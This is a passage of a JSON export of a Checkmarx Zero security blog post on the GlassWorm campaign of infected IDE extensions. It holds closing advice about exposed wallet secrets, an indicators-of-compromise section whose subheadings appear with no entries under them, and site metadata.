Because the later stages also target wallets and wallet-related data, impacted users should also treat cryptocurrency wallet secrets, passphrases, and recovery material as potentially exposed and respond accordingly.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-6\">GlassWorm Indicators of Compromise (IoC)<\/h2>\n\n\n\n<details><summary style=\"font-size: 120%; font-weight: bold;\">Expand for details of IoCs<\/summary>\n\n\n\n<h3 class=\"wp-block-heading\">Network<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">Blockchain address<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">IP address<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">Stage-delivery<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">Artifacts<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">Extensions<\/h3>\n\n\n\n<p><strong>Note<\/strong>: this list includes the extensions mentioned in this post, as well as others recently identified by both Checkmarx Zero and other researchers within the community, and is provided as a convenience for defenders.<\/p>\n\n\n\n<\/details>","protected":false},"excerpt":{"rendered":"<p>The GlassWorm malware campaign continues to adapt to defender detection tactics. The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections. 
Learn how this new tactic works and how to defend.<\/p>\n","protected":false},"author":164,"featured_media":107819,"template":"","zero-category":[1176,1104],"zero-tag":[1505,1504,1336,1458],"class_list":["post-107815","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-security-blogs","zero-category-technical-blog","zero-tag-deep-dive","zero-tag-glassworm","zero-tag-malicious-package","zero-tag-vscode-extension"],"acf":[],"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/107815","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/164"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/107819"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=107815"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=107815"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=107815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}